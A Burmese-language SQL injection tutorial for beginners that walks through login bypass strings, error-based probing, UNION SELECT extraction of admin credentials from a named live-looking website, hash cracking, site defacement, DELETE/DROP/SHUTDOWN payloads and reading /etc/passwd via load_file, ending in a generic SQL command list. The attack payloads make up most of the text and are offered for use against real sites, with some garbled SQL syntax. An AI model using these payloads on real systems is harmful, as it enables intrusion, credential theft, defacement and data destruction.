SQL Injection Attack Myanmar Version for Begineers
3thic0kiddi3
SQL Injection Attack For Beginners By 3thic0kiddi3 -- SQL INJECTION ဆုိသညးမြာ (ေရ့သူ- ကို BrB) SQL injection ဆုိတာကေတာံ ယေန႔ေခတး အငးတာနကးစာမ္ကးႏြာေပၚမြာ အၿဖစးအမ္ာ့ဆုဵ့ web application အမြာ့ၿဖစးပါတယး။ ၄ငး့ web application အမြာ့တစးခုမြေန၍ တရာ့မွငး ွငးေရာကးအသုဵ့ၿပဳသူေတျ (Hackers) က မိမိတုိ႔ရဲ႕ အေရ့ၾကီ့တဲ႔ အခ္ကးအလကးေတျကုိ ခုိ့ယူသျာ့ႏုိငးပါတယး။ ဒါေၾကာငံး SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမြာ့ေၾကာငံးမဟုတးပဲ အေတျ႔အၾကဵဳမံဲ၊ အေရအခ္ငး့ ညံဵဖ္ငး့တဲ႔ programming ေရ့ဆျဲသူေတျေၾကာငံးသာၿဖစးပါတယး။ ဒီနညး့လမး့က အေွ့တစးေနရာကေန application, web server ကုိ အလျယး ကူဆုဵ့ထိနး့ခ္ဳပးႏုိငးပါတယး။ ဒီ SQL injection မြာ ပုဵစဵအမ္ဳိ့မ္ဳိ့ေသာ SQL commands ေတျ နဲ႔ web page ကေန အမ္ဳိ့မ္ဳိ့ေသာ data ေတျကို ထုတးယူႏုိငးပါတယး။ ဥပမာတစးခုအေနနဲ႔ေၿပာမယးဆုိရငး ကၽျနးေတားတုိ႔က Company တစးခုရဲ႕ Network တစးခုကွ ုိ ငးေရာကးေတာံမယးဆုိရငး port scanner ေတျနဲ႔ sanner ဖတးၿပီ့ အမြာ့ေတျနဲ႕ ပျငံးဟေနတဲ႔ port ကေန ွငးေရာကးသျာ့ႏုိငးပါတယး။ ဒါေပမဲ႔လညး့ အငးတာနကးနဲ႔ ခ္ိတးဆကးထာ့တဲ႔ Web Server (Host Sever) တစးခုက port 80 ေလာကးပဲဖျငံးမယး၊ တစးၿခာ့ security ပုိငး့ေတျ ေပ့ထာ့မယးဆုိရငး port scanner ဘယးေလာကးေကာငး့ေကာငး့ အလုပးၿဖစးမြာမဟုတးပါဘူ့၊ ွငးေရာကးဖုိ႔ခကးသျာ့ပါလိမံးမယး( ခကးခဲေနမယး )... ဒါဆုိရငး Web Hacking ကုိ ဦ့တညးၿပီ့ေၿပာငး့ၾကညံးရပါလိမံးမယး... Web Hacking လုိ႔ေၿပာရငး ေတားေတားမ္ာ့မ္ာ့ကေတာံ SQL Injection ကုိပထမဦ့စျာေၿပ့ၿမငးၾကမြာပါပဲ... ဟုတးတယးေလ.. SQL Injection ကတစးၿခာ့ဘာမြမလုိဘူ့ Web Browser တစးခုပဲလုိတယး...
SQL Injection အေႀကာငး့ရြငး့်ပခ္ကးမ္ာ့SQL injection နဲံပါတးသတးလိုံ Web development knowledge ရြိရငးေတာံပိုေကာငး့ပါတယး။PHP နဲံ MysqL အေႀကာငး့ Knowledge နဲနဲရြိထာ့ရငးေတာံ ပို ်ပီ့နာ့လညးပါလိမးံမယး။ ---DATABASE ဆိုတာဘာလဲ?--ရုိ့ရုိ့ရြငး့ရြငး့ပါပဲ... Database ဆုိတာဘာလဲဆုိရငး Database ဆုိတာ အခ္ကးအလကး Data
ေတျစုစညး့သိမး့ဆညး့ထာ့တဲ႔ Application တစးခုပါပဲ... Application Programming Interface (API) ေတျကုိ တညးေဆာကး အသုဵ့ၿပဳမယး ထိနး့သိမး့ သိမး့ဆညး့ထာ့မယး။ Database(DB) servers ေတျဟာ Web development လုပးငနး့ေတျ နဲ႔လညး့ ေပါငး့စညး့အသုဵ့ၿပဳလုိ႔ရတဲ႔အတျကး ၄ငး့အထဲက data ေတျကုိ ထုတးယူအသုဵ့ၿပဳ၊ ၾကညံးရႈ႕ဖုိ႔ဆုိတာ ခကးခဲ႔တဲ႔ကိစၥတစးခုေတာံမဟုတးပါဘူ့။ Database အထဲမြာ usernames, passwords စသညး ေတျလုိ အေရ့ၾကီ့တဲ႔ အခ္ကးအလကးေတျကုိလညး့ သိမး့ဆညး့ႏုိငးတာ ၿဖစးတဲ႔အတျကး Database ရဲ႕ လုဵၿခဵဳေရ့ဟာလညး့ အလျနးကုိအေရ့ၾကီ့ပါတယး။ ထိနး့သိမး့မႈ ညဵံဖ္ငး့တဲ႔ database တစးနညး့အာ့ၿဖငံး အမြတးတမဲ႔ၿဖစးေစ၊ သတိမမႈ၍ေသားလညး့ေကာငး့၊ အေၾကာငး့ေၾကာငး့အမ္ဳိ့မ္ဳိ့ေၾကာငံး programmer ေတျေရ့သာ့ထာ့တဲ႔ code ေတျရဲ႕ လျဲမြာ့မႈေတျ ေၾကာငံး ဒီလုိဟာကျကးေတျ ၿဖစးေပၚကာ database ထဲကုိ အၿခာ့ တရာ့မွငး ွငးေရာကးသူတုိ႔အာ့ လမး့ဖျငံးေပ့သလုိၿဖစးသျာ့တတးပါတယး။ DB servers ေတျအမ္ာ့ၾကီ့ရြိတဲ႔အထဲမြာ ဒါေလ့ေတျက အသုဵ့မ္ာ့တာေလ့ေတျပါ။ MySQL(Open source), MSSQL, MS-ACCESS, Oracle, Postgre SQL(open source), SQLite စသညးေပါ႔...
Database ရဲ႕ တညးေဆာကးပုဵေလ့ကုိ ၿမငးႏုိငးေအာငးလုိ႔ ဇယာ့ေလ့နဲ႔ၿပထာ့တာပါ။
---ေရြာငးကျငး့ ွငးေရာကးၿခငး-့ -Site ေတျမြာ username, password ေတျနဲ႔ login ွငးခုိငး့တယးဆုိတာ site အထဲမြာ ရြိတဲ႔ content ေတျကုိ မြတးပုဵတငးထာ့တဲ႔သူ (username & password ရြိထာ့တဲ႔သ)ူ ေတျကုိသာ ၾကညံးရႈအသုဵ့ၿပဳချငံးေပ့ထာ့တာပါ။ အကယး၍ မိတးေဆျက username & password မရြိပဲ ရြိသကဲ႔သုိ႔ ွငးေရာကးအသုဵ့ၿပဳမယး (user registration မလုပးပဲ ွငးေရာကးတယး) ဆုိရငး ဒါကုိ BYPASSING LOGINS လုပးတယးလုိ႔ေခၚပါတယး။
ဒါကေတာံprogrammer ရဲ႕ login မြာစီစစးမႈ မေသခ္ာလုိ႔ ၿဖစးတဲ႔အတျကး ကဵေကာငး့ေထာကးမစျာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ွငးလုိ႔ရသျာ့ပါလိမံးမယး။ ဥပမာတစးခုအေနနဲ႔ ၾကညံးမယးဆုိရငး username က admin ၿဖစးၿပီ့ password က 12345 ဆုိၾကပါစု.ိ႔ .. ဒါဆိုရငး SQL query က SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီ့ၿဖစးသျာ့ပါလိမံးမယး..... အကယး၍ အေပၚ SELECT command တနးဖုိ့က မြနးတယးဆုိရငး site ထဲကုိ ွငးချငံးၿပဳမြာၿဖစးပါတယး။ အကယး၍ အထကးပါေၿပာခဲ႔သလုိ programmer က login မြာမြနးကနးတဲ႔စီစစးမႈမရြိရငး Hacker ေတျက ေအာကးပါအတုိငး့ ွငးေရာကးသျာ့ႏုိငးပါတယး။ username:a or 1=1-password:blank SQL query မြာေတာံ SELECT USER from database WHERE username='a' or 1=1-- AND password='' ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခာ့ comment operator က /* ၿဖစးပါတယး။ SELECT USER from database WHERE username='a' or 1=1 1=1 က အၿမဲတနး့ query ကုိ true ၿဖစးေစၿပီ့ OR ကေတာံ query တစးခုက true ၿဖစးတဲ႔အတျကး အၿခာ့တစးခုကုိလညး့ true ၿဖစးသျာ့ေစပါတယးဒါေၾကာငံး 'a' ဆုိတဲ႔ user ဟာ DB မြာမရြိေတာငးမြ ဒီ query က true ၿဖစးကာ site admin ကိွ ု ငးေရာကးချငံးေပ့သျာ့ပါလိမံးမယး... ဒီလုိနညး့နဲ႔ Vulnerable ၿဖစးတဲ႔ site ေတျအတျကး ေအာကးပါအတုိငး့ စမး့စစးႏုိငးပါေသ့တယး... username:' or 1='1 password:' or 1='1 username:'
or '1'='1' password:' or '1'='1' username:or 1=1 password:or 1=1
--- လ္ဳိ႕ွြကးထာ့ေသာ Data မ္ာ့ကုိ ွငးေရာကးအသုဵ့ၿပဳၿခငး့--SQL injection က အခုလုိ bypassing logins တစးခုတညး့မဟုတးပဲ DB servers ကေန လ္ဳိ႕ွြကးစျာသိမး့ဆညး့ထာ့တဲ႔ Data ေတျကုိ ရယူႏုိငးပါတယး... အနညး့ငယးရႈပးေထျ့ေနမြာၿဖစးတဲ႔အတျကး နဲနဲေလ့ အထူ့ဂရုၿပဳၿပီ့ေတာံ ေလံလာၾကညံးပါ။ ေအာကးပုိငး့မြာ လကးေတျ႔စမး့လုိ႔ရေအား site link နဲ႔ တကျ ေဖားၿပေပ့ထာ့ပါတယး။ ---အာ့နညး့ခ္ကး အမြာ့မ္ာ့ ရြာေဖျစစးေဆ့ၿခငး့--Site တစးခုကုိရြာလုိကးမယး... In PHP ==>> www.site.com/article.php?id=5 id variable assign လုပးထာ့တဲ႔ ေနာကးနာ့က ' (apostrophe) ေလ့တစးခုကုိ ထညံးလုိကးပါမယး.. www.site.com/article.php?id=5' ဒီလုိလုိ စမး့တဲ႔ေနရာမြာ Integer Based www.site.com/script.php?param=36' www.site.com/script.php?param='36' www.site.com/script.php?param=(12+24) [url=http://www.site.com/script.php?param=%]www.site.com/script.php?param=%[/url] www.site.com/script.php?param=36'a
String Based www.site.com/script.php?param=Text'-www.site.com/script.php?param=Te'+'xt [url=http://www.site.com/script.php?param=Tex%]www.site.com/script.php?param=Tex%[/url ] ဆုိၿပီ့ရြိပါတယး.. အဆငးေၿပသလုိ စမး့သပးႏုိငးပါတယး... အကယး၍ ၄ငး့ရဲ႕ site က vulnerable မၿဖစးဘူ့ဆုိရငး ပုဵမြနးအတုိငး့ page loading လုပးသျာ့ပါလိမံးမယး.. အဲ႔လုိမဟုတးပဲ query string filtering မရြိဘူ့ဆုိရငး "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတး Check the correct MySQL version သုိ႔မဟုတး MySQL Fetch error သုိ႔မဟုတးပါက ဘာမြမေပၚပဲ page အၿဖဴၾကီ့သာေပၚေနပါလိမံးမယး... ဒါဆုိရငး ဒီ site က vulnerable ၿဖစးေနပါတယး အကယး၍ ' ၿဖငံး မရလြ္ငး ေအာကးပါအတုိငး့ union select 1-- ဆုိတာကုိသုဵ့ႏုိငးပါတယး။ www.site.com/article.php?id=5 union select 1-In ASP ==>> အထကးပါနညး့အတုိငး့ http://www.site.com/index.asp?id=5 ဆုိရငး ေနာကးက ' (apostrophe) ေလ့ထညံးၿပီ့စမး့ႏုိငးပါတယး။ http://www.site.com/index.asp?id=5' ဒါဆုိရငး Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'table1' to a column of data type int. /index.asp, line 5 ဆုိတဲ႔ error မ္ဳိ့ေပၚေနတတးၿပီ့ ASP, JSP, CGI, နဲ႔ PHP web pages ေတျမြာ စမး့သပးႏုိငးပါတယး။ အကယး၍ URL မြာ မေပၚတဲ႔ parameters မ္ဳိ့ဆုိရငး ၄ငး့တုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ္ဳိ့ေတျက ရြာႏုိငးပါတယး.. တစးခ္ဳိ႕ html page ေတျက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာငးေပ့တဲ႔ parameters သုဵ့ထာ့တတးပါတယး.. ဒါဆုိရငးေတာံ ၄ငး့တုိ႔ရဲ႕ HTML source code ထဲကုိ ွငးေရာကးပါ။ ၿပီ့ရငး "FORM" tag ကုိရြာလုိကးပါ ... ဥပမာ <FORM action=Search/search.asp method=post> <input type=hidden name=A value=C> </FORM>
ဒီ <FORM></FORM> ႏြစးခုၾကာ့က ၿဖစးႏုိငးေၿခေတျပါ။ <FORM action=http://duck/Search/search.asp method=post> <input type=hidden name=A value='a' or 1=1--"> </FORM>
value မြာ အေပၚကအတုိငး့ BYPASSING LOGINS မြာသုဵ့သလုိ စမး့သပးၿပီ့ရြာေဖျႏုိငးပါတယး။
---Columns အေရအတျကးရြာေဖျၿခငး့--‘order by’ ကုိအသုဵ့ၿပဳၿပီ့ Columns မ္ာ့ကုိ ရြာေဖျမြာၿဖစးပါတယး.. URL query ကုိေအာကးပါတုိငး့ ရုိကးထညံးလုိကးပါမယး... '/*' သုိ႔မဟုတး '--" ဆုိတာေလ့သုဵ့လုိ႔ရပါတယး.. www.site.com/article.php?id=5 order by 1/* အမြာ့မေပၚဘူ့ဆုိရငး ေနာကးတစးခါ 2 ဆုိၿပီ့တုိ့ကာ ရုိကးထညံးပါမယး www.site.com/article.php?id=5 order by 2/* ယခုအခ္ိနးအထိ အမြာ့မေပၚေသ့ဘူ့ဆုိရငး ေနာကးတစး ထပးၿပီ့တုိ့ပါမယး.. ဒီလုိတုိ့တုိ့ၿပီ့ အမြာ့ေပၚလာတဲ႔အထိ ရြာေဖျရမြာၿဖစးပါတယး... www.site.com/article.php?id=5 order by 3/* အခု 3 ကုိေရာကးတဲ႔အခါ အမြာ့ေတျ႔တယးဆုိရငး ဒါဆုိရငး ကၽျနးေတားတုိ႔ Columns ႏြစးခုရြိတယးဆုိတာ သိသျာ့ပါၿပီ... ဒီလုိနညး့နဲ႔ Column ေတျကုိ တစးဆငံးၿခငး့ရြာေဖျရပါတယး... ေနာကးတစးခု ပုဵနဲ႔ တကျ ရြာေဖျၾကညံးရေအာငး
http://sbisa.org/circle.php?id=26 ကုိၾကညံးမယး..
http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာကးမြာ ' ဆုိတဲ႔ (apostrophe) တစးခုထညံးလုိကးပါမယး..
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစးခုေတျ႔ပါလိမံးမယး.. ဒါဆုိရငးေသခ္ာတယး.. SQL error တစးခုတကးေနၿပီ... တိတိက္က္ေၿပာရရငး DB Server က MySQL OK, ဒါဆုိရငး ကၽျနးေတားတုိ႔ Columns အေရအတျကးရြာမယး... http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆငံးအဆငံးရြာတယး... error မၿဖစးေသ့ဘူ့
7 အထိေရာကးတဲ႔အခါမြာေတာံ error ေတျ႔တယးဆုိရငး ဒါဟာ 6 Columns ရြိတယး...
ဒါဆုိရငးေနာကးထပး UNION SELECT ALL ဆုိတဲ႔ statement တစးခုကုိသုဵ့မယး.. http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီ့ရုိကးထညံးလုိကးမယး..
ဒါဆုိရငး 2,3,4 ဆုိတာၿပမယး.. ဒီအပုိငး့ေတျက data ေတျသိမး့ဆညး့ထာ့တဲ႔ Columns ေတျၿဖစးတယး... ---MySQL version ရြာၿခငး့--ဒီ Injection မြာ MySQL Version ကုိ checking လုပးဖုိ႔လုိပါတယး... . Version အာ့ Checking လုပးရနး @@version သုိ႔မဟုတး version() functions ေတျကုိသုဵ့ေပ့ရပါမယး.. အခု @@version ကုိ data ေတျသိမး့ဆညး့ထာ့တဲ႔ column မြာထညံးၿပီ့ MySQL version ကုိစစးမယး.. http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--
သုိ႔မဟုတး http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6-ကုိသုဵ့ႏုိငးပါတယး.. တခါတစးေလမြာ အထကးပါနညး့အတုိငး့က error ေတျၿဖစးတတးတဲ႔အတျကး unhex(hex()) ကုိသုဵ့ေပ့ရပါမယး.. http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6-ဒါဆုိရငး Server မြာ အသုဵ့ၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖားၿပေပ့သျာ့ပါလိမံးမယး... အကယး၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ္ငးတယးဆုိရငး ေအာကးပါတုိငး့ checking လုပးႏုိငးပါတယး.. www.site.com/article.php?id=5 UNION ALL SELECT user(),2/* www.site.com/article.php?id=5 UNION ALL SELECT database(),2/* ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--
---MySQL 5 ႏြငံးအထကး injection--အခုကၽျနးေတားတုိ႔ ရတာ MySQL version 5.0.90 ၿဖစးပါတယး... MySQL version 5 မြာ information_schema ဆုိတဲ႔ အသုဵ့ွငးတဲ႔ funtion တစးခုပါွငးၿပီ့ ၄ငး့က လကးရြိ DB server ရဲ႕ tables နဲ႔ columns ေတျကုိ ထိနး့သိမး့ထာ့တာၿဖစးပါတယး... Tables ေတျကုိရယူရနး table_name from information_schema.tables ဆုိတာကုိသုဵ့သလုိ Columns ေတျကုိရယူရနး column_name from information_schema.columns
ဆုိတာကုိသုဵ့ရပါမယး.. ေနာကးတစးခုကေတာံ ဒီ site အေပၚမြာ ၿမငးရေအာငးလုိ႔ group_concat(table_name) ကုိ Tables ေတျအတျကးနဲ႔ group_concat(column_name)ကုိ Columns ေတျအတျကးသုဵ့ေပ့ရပါတယး... http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
ေစာေစာက ကၽျနးေတားတုိ႔ MySQL version ကုိ @@version အစာ့ unhex(hex()) နဲ႔သုဵ့ခဲ႔ရတယးဆုိရငး အခု Table နဲ႔ Column ကုိရြာတဲ႔အခါမြာလညး့ အဲ႔လုိပဲ သုဵ့ေပ့ရပါတယး။ http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()-ေနာကးထကးတစးခါ ကၽျနးေတားတုိ႔ Columns ေတျကုိၾကညံးမယးဆုိရငး http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
ဒါဆုိရငး DB ထဲက table ေတျကုိ ေဖားၿပေပ့ပါၿပီ... အခု ကၽျနးေတားတု႔ိဒီ tables ေလ့ေတျကုိ စနစးတက္ မြတသ း ာ့ထာ့ပါမယး... ေနာကးတစးဆငံးတကးကာ ကၽျနးေတားတုိ႔လုိခ္ငးတဲ႔ user name နဲ႔ password ေတျ သိမး့ထာ့တဲ႔ table ကုိၾကညံးပါမယး... group_concat ကုိပဲ ဆကးလကးသုဵ့ပါမယး.. ဒါေပမဲ႔ ကၽျနးေတားတုိ႔ လုိခ္ငးတဲ႔ username, password ေတျသိမး့ထာ့ေလာကးတဲ႔ columns ေတျထဲက စစးထုတးယူမြာပါ။ ဒီေနရာမြာ ကၽျနးေတားတုိ႔ မြနး့ထာ့တဲ႔ table အမညးကုိ from information_schema.tables where table_schema=database-- ေနရာမြာ ထညံးသျငး့မြာၿဖစးပါတယး..
0x3a ဆုိတာကေတာံ ":" ရဲ႕ hex code ပါ။ http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
ဒါဆုိရငးေတာံ မိမိတုိ႔လုိခ္ငးတဲ႔ username နဲ႔ password ကုိရသျာ့ပါၿပီ... ရရြိထာ့တဲ႔ password ဟာ plaintext ၿဖစးတယးဆုိရငးေတာံ ထပးၿပီ့ေခါငး့ရႈပးစရာမလုိေတာံဘူ့ေပါ႔ တစးခ္ဳိ႕ကေတာံ password hashed လုပးထာ့တဲ႔ အတျကး ၄ငး့တုိ႔အာ့ hash cracker ေတျနဲ႔ ေၿဖထုတးေပ့ရပါလိမံးမယး.. ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927 John The Ripper www.openwalls.org Cain & Able www.oxid.it hash လုပးထာ့တဲ႔ password ေတျသာဆုိရငးေတာံ အနညး့ငယးခကးသျာ့ပါလိမံးမယး... အထကးပါ hash ကုိ crack လုပးလုိကးရငး adminlanetCreator ဆုိၿပီ့ရပါမယး.. ကဲ ဒါဆုိရငးေတာံ admin နဲ႔ password ကုိရၿပီဆုိရငး ကုိယးလုပးခ္ငးသလုိလုပးေပေတာံ.. ---MySQL version 4 injection--MySQL version က 4 ၿဖစးမယးဆုိရငး version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပးတဲ႔အတျကး table name နဲ႔ column name ေတျကုိ guess လုပးရပါတယး... ေနာကးတစးခုက error message အေပၚမြာအေၿခခဵၿပီ့ခနး႔မြနး့ရတာပါ။ The error
reports pnc_article in the error ဆုိရငး pnc ဆုိတဲ႔ prefix ကုိသုဵ့ထာ့တဲ႔အတျကး table name က pnc ဆုိတာ ခနး႔မြနး့လုိ႔ရႏုိငးပါတယး။
ဥပမာ ကၽျနးေတားက table name ကုိ user ဆုိၿပီ့ ခနး႔မြနး့လုိကးမယး.. ဒါဆုိရငး ေအာကးပါအတုိငး့ရုိကးထညံးေပ့ၾကညံးမယးဆုိပါစု႔ ိ www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/* အထကးပါအတုိငး့ရုိကးထညံးလုိကးလုိ႔ error ၿဖစးေနတယးဆုိရငး ဒါဟာ table မရြိလုိပ.ဲ .. ေနာကးတစးခါထပးၿပီ့ guess လုိကးပါ... table name ကုိ tbluser ဆုၿိ ပီ့ထာ့လုိကးပါမယး.. www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/* ဒီလုိနညး့နဲ႔ table name ေတျ column ေတျအာ့ ခနး႔မြနး့ၿပီ့ထညံးသျာ့ရပါလိမံးမယး... www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/* www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/* www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/* www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/* www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/* ေနာကးဆုဵ့ username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔... Table name အခ္ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc. ဒါဟာ Injection ရဲ႕ လ္ဳိ႕ွြကးထာ့တဲ႔ Data မ္ာ့ကုိ ရယူတဲ႔အပိုငး့ၿဖစးပါတယး... Admin ရဲ႕ username & password ရၿပီဆုိရငး Admin Login Page မြာရုိကးထညံးရပါမယး... Joomla ဆုိရငး /administrator နဲ႔ Wordpress ဆုိရငး /wp-admin ၿဖစးပါတယး.. အခ္ဳိ႕ site ေတျက admin panel ကုိရြာရခကး ေနပါလိမမ ံး ယး.. ဒါဆုိရငး admin panel finder ေလ့ေတျကုိသုဵ့ၿပီ့ရြာေဖျရပါလိမံးမယး... Admin Panel Finder
http://www.planetcreator.net/planetc...inpanelfinder/ နဲ႔ရြာႏုိငးပါတယး။ ---Site အာ့ၿပငးဆငးၿခငး့ --အခ္ဳိ႕ေသာ Site ေတျက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခကးခဲၿခငး့၊ ရြာမေတျ႔ၿခငး့ေတျနဲ႔ ၾကဵဳရတတးပါတယး... ဒီလုိေနရာမြာ SQL commands ေတျကုိသုဵ့ၿပီ့ အထဲက site ရဲ႕ contents ေတျကုိၿပငးဆငးေၿပ့သျာ့ရမြာၿဖစးပါတယး... ဒါေလ့ေတျက အေရ့ပါတဲ႔ command ေလ့ေတျပါ UPDATE:It is used to edit infos already in the db without deleting any rows. DELETE:It is used to delete the contents of one or more fields. DROP: It is used completely delete a table & all its associated data. UPDATE:www.site.com/article.php?id=5 ဆုိၾကပါစုိ႔ကၽျနးေတားတုိ႔ရဲ႕ query က ေအာကးပါအတုိငး့ၿဖစးမယးဆုိရငး SELECT title,data,author FROM article WHERE id=5 (table name နဲ႔ column ေတျက အထကးပါအတုိငး့ရြာေဖျက ထညံးေပ့ရတာၿဖစးပါတယး) ေအာကးပါအတုိငး့ site ကုိၿပငးေပ့သျာ့ပါမယး... www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/* ခကးဆနး့ဆနး့ေလ့ ထကးၿပီ့ အရစးတကးလုိကးမယးဆုိရငး www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/* သတးမြတးထာ့တဲ႔ page ေၿပာငး့လဲၿပီ့ update လုပးခ္ငးတယးဆုိရငးေတာံ ေအာကးပါအတုိငး့ ရုိကးထညံးေပ့ရပါတယး..
www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/* DELETE:- DB Server ထဲကေန အၿမဲတမး့ဖ္ကးပစးေတာံမယးဆုိရငး DELETE command ကုိသုဵ့သျာ့ပါမယး.. www.site.com/article.php?id=5 DELETE title,data,author FROM article/* သတးမြတးထာ့တဲ႔ page ကုိ delete လုပးခ္ငးတယးဆုိရငး ေအာကးပါ table name ရဲ႕ ေနာကးထဲမြ WHERE နဲ႔ page id ကုိထညံးသျငး့သျာ့ရပါမယး... www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/* ဒီတစးခုကေတာံ DROP TABLE ပါ... Table အလုိကး ဖ္ကးခ္ငးတယး ဆုိရငးေတာံ DROP Table နဲ႔ table name ကုိဆုိၿပီ့သုဵ့ပါမယး... www.site.com/article.php?id=5 DROP TABLE article/* ဒီအတုိငး့ဖ္ကးရငး table ေတျေကာ အထဲမြာပါတဲ႔ contents ေတျေကာ အာ့လုဵ့ ပ္ကးသျာ့ပါလိမံးမယး... SHUTTING DOWN MySQL SERVER: www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT; LOADFILE: Server အထဲက .htaccess, .htpasswd ေတျနဲ႔ password files ေတျၿဖစးတဲ႔ etc/passwd စသညံး ဖုိငးေတျကုိ ယူခ္ငးတယးဆုိရငးေတာံ LOADFILE ကုိသုဵ့ရပါတယး... ဒါကအသုဵ့ေတာံနညး့ပါတယး.... www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/* အကယး၍ hex ေတျနဲ႔ဆုိရငးေတာံ ေအာကးပါတုိငး့ သုဵ့ပါမယး..
www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427) ဒါကုိ Hex based SQL Injection လုိ႔လညး့ေခၚႏုိငးပါတယး.. * SELECT LOAD_FILE(0x633A5C626F6F742E696E69) ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆျဲယူေပ့ပါလိမံးမယး..
---MySQL ROOT--MySQL version 5 နဲ႔အထကးမြာ mysql.user ဆုိတဲ႔ table တစးခုဟာ MySQL servers ေတျမြာရြိပါတယး... အထဲမြာ hash လုပးထာ့တဲ႔ Password နဲ႔ username ေတျပါွငးပါတယး... ၄ငး့အထဲက hash ဟာ mysqlsha1 ၿဖစးတဲ႔အတျကး John The Ripper နဲ႔ crack လုပးဖုိ႔ခကးပါမယး.. www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/* ဒီအတျကး InsidePro Password Recovery Software ကုိသုဵ့လုိ႔ရပါတယး.. http://www.insidepro.com
---အသုဵ့ွငးတဲ႔ MySQL commands အခ္ိဳ႕ပါ..--ABORT — abort the current transaction ALTER DATABASE — change a database ALTER GROUP — add users to a group or remove users from a group ALTER TABLE — change the definition of a table ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account ANALYZE — collect statistics about a database BEGIN — start a transaction block CHECKPOINT — force a transaction log checkpoint CLOSE — close a cursor CLUSTER — cluster a table according to an index COMMENT — define or change the comment of an object COMMIT — commit the current transaction COPY — copy data between files and tables CREATE AGGREGATE — define a new aggregate function CREATE CAST — define a user-defined cast CREATE CONSTRAINT TRIGGER — define a new constraint trigger CREATE CONVERSION — define a user-defined conversion CREATE DATABASE — create a new database CREATE DOMAIN — define a new domain CREATE FUNCTION — define a new function CREATE GROUP — define a new user group CREATE INDEX — define a new index CREATE LANGUAGE — define a new procedural language CREATE OPERATOR — define a new operator CREATE OPERATOR CLASS — define a new operator class for indexes CREATE RULE — define a new rewrite rule CREATE SCHEMA — define a new schema CREATE SEQUENCE — define a new sequence generator CREATE TABLE — define a new table CREATE TABLE AS — create a new table from the results of a query CREATE TRIGGER — define a new trigger CREATE TYPE — define a new data type CREATE USER — define a new database user account CREATE VIEW — define a new view DEALLOCATE — remove a prepared query
DECLARE — define a cursor DELETE — delete rows of a table DROP AGGREGATE — remove a user-defined aggregate function DROP CAST — remove a user-defined cast DROP CONVERSION — remove a user-defined conversion DROP DATABASE — remove a database DROP DOMAIN — remove a user-defined domain DROP FUNCTION — remove a user-defined function DROP GROUP — remove a user group DROP INDEX — remove an index DROP LANGUAGE — remove a user-defined procedural language DROP OPERATOR — remove a user-defined operator DROP OPERATOR CLASS — remove a user-defined operator class DROP RULE — remove a rewrite rule DROP SCHEMA — remove a schema DROP SEQUENCE — remove a sequence DROP TABLE — remove a table DROP TRIGGER — remove a trigger DROP TYPE — remove a user-defined data type DROP USER — remove a database user account DROP VIEW — remove a view END — commit the current transaction EXECUTE — execute a prepared query EXPLAIN — show the execution plan of a statement FETCH — retrieve rows from a table using a cursor GRANT — define access privileges INSERT — create new rows in a table LISTEN — listen for a notification LOAD — load or reload a shared library file LOCK — explicitly lock a table MOVE — position a cursor on a specified row of a table
